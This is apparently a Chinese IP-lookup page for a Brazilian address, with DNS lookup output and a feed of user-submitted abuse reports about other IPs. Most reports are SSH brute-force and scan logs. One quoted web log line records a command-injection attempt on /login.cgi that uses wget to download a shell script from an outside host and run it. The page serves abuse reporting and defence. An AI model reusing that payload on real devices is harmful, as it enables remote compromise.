必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Brazil

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 191.194.106.145
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 20741
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;191.194.106.145.		IN	A

;; AUTHORITY SECTION:
.			454	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020010700 1800 900 604800 86400

;; Query time: 199 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jan 07 21:12:27 CST 2020
;; MSG SIZE  rcvd: 119
HOST信息:
145.106.194.191.in-addr.arpa domain name pointer 191-194-106-145.user.vivozap.com.br.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
145.106.194.191.in-addr.arpa	name = 191-194-106-145.user.vivozap.com.br.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
185.200.118.50 attackspambots
3128/tcp 3389/tcp 1194/udp...
[2019-05-08/06-22]19pkt,3pt.(tcp),1pt.(udp)
2019-06-22 18:29:37
97.90.133.4 attackbotsspam
Jun 22 10:39:03 ncomp sshd[18798]: Invalid user oracle from 97.90.133.4
Jun 22 10:39:03 ncomp sshd[18798]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=97.90.133.4
Jun 22 10:39:03 ncomp sshd[18798]: Invalid user oracle from 97.90.133.4
Jun 22 10:39:05 ncomp sshd[18798]: Failed password for invalid user oracle from 97.90.133.4 port 37120 ssh2
2019-06-22 18:10:48
125.136.181.85 attackspambots
Autoban   125.136.181.85 AUTH/CONNECT
2019-06-22 18:12:05
200.187.169.65 attack
DATE:2019-06-22 06:25:25, IP:200.187.169.65, PORT:telnet - Telnet brute force auth on a honeypot server (epe-dc)
2019-06-22 18:35:13
203.109.106.156 attackbots
LGS,WP GET /wp-login.php
2019-06-22 18:29:19
201.156.144.160 attack
MultiHost/MultiPort Probe, Scan, Hack -
2019-06-22 18:18:12
221.229.207.213 attackspam
22.06.2019 08:24:38 Connection to port 1433 blocked by firewall
2019-06-22 18:17:52
77.27.40.96 attackspambots
Jun 18 21:47:11 h2421860 postfix/postscreen[8772]: CONNECT from [77.27.40.96]:37730 to [85.214.119.52]:25
Jun 18 21:47:11 h2421860 postfix/dnsblog[8775]: addr 77.27.40.96 listed by domain ix.dnsbl.xxxxxx.net as 127.0.0.2
Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain bl.spamcop.net as 127.0.0.2
Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain zen.spamhaus.org as 127.0.0.3
Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain zen.spamhaus.org as 127.0.0.4
Jun 18 21:47:11 h2421860 postfix/dnsblog[8776]: addr 77.27.40.96 listed by domain Unknown.trblspam.com as 185.53.179.7
Jun 18 21:47:11 h2421860 postfix/dnsblog[8777]: addr 77.27.40.96 listed by domain b.barracudacentral.org as 127.0.0.2
Jun 18 21:47:11 h2421860 postfix/dnsblog[8780]: addr 77.27.40.96 listed by domain dnsbl.sorbs.net as 127.0.0.6
Jun 18 21:47:12 h2421860 postfix/postscreen[8772]: PREGREET 46 after 1.2 from [77........
-------------------------------
2019-06-22 18:48:01
187.162.31.205 attack
MultiHost/MultiPort Probe, Scan, Hack -
2019-06-22 18:24:28
106.13.6.61 attackspambots
106.13.6.61 - - [22/Jun/2019:06:25:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0"
...
2019-06-22 18:40:48
177.139.153.186 attackbotsspam
Jun 17 11:18:49 cumulus sshd[11842]: Invalid user lievens from 177.139.153.186 port 46476
Jun 17 11:18:49 cumulus sshd[11842]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.139.153.186
Jun 17 11:18:51 cumulus sshd[11842]: Failed password for invalid user lievens from 177.139.153.186 port 46476 ssh2
Jun 17 11:18:51 cumulus sshd[11842]: Received disconnect from 177.139.153.186 port 46476:11: Bye Bye [preauth]
Jun 17 11:18:51 cumulus sshd[11842]: Disconnected from 177.139.153.186 port 46476 [preauth]
Jun 17 11:26:32 cumulus sshd[12773]: Invalid user rexmen from 177.139.153.186 port 51433
Jun 17 11:26:32 cumulus sshd[12773]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.139.153.186
Jun 17 11:26:34 cumulus sshd[12773]: Failed password for invalid user rexmen from 177.139.153.186 port 51433 ssh2
Jun 18 11:37:20 cumulus sshd[29846]: Invalid user roehl from 177.139.153.186 port 50316
Jun........
-------------------------------
2019-06-22 18:24:47
181.197.90.190 attackbotsspam
*Port Scan* detected from 181.197.90.190 (PA/Panama/-). 4 hits in the last 35 seconds
2019-06-22 18:42:56
118.26.64.58 attackspambots
vps1:sshd-InvalidUser
2019-06-22 18:12:29
105.235.116.254 attackspambots
Jun 22 08:18:06 ubuntu-2gb-nbg1-dc3-1 sshd[32161]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=105.235.116.254
Jun 22 08:18:09 ubuntu-2gb-nbg1-dc3-1 sshd[32161]: Failed password for invalid user napaporn from 105.235.116.254 port 50106 ssh2
...
2019-06-22 18:08:17
79.115.141.228 attackbotsspam
Jun 22 04:26:29 localhost sshd\[20254\]: Invalid user pi from 79.115.141.228 port 33200
Jun 22 04:26:29 localhost sshd\[20254\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.115.141.228
Jun 22 04:26:30 localhost sshd\[20256\]: Invalid user pi from 79.115.141.228 port 33210
...
2019-06-22 18:08:47

最近上报的IP列表

54.249.234.239 123.20.0.219 128.160.44.111 149.121.128.47
115.229.1.140 128.210.89.45 89.121.94.50 88.40.199.136
101.244.192.136 49.249.44.60 136.120.71.203 117.33.78.29
225.144.134.175 70.127.224.133 89.172.11.233 69.223.79.129
56.112.62.31 140.174.191.30 175.231.11.48 106.245.143.247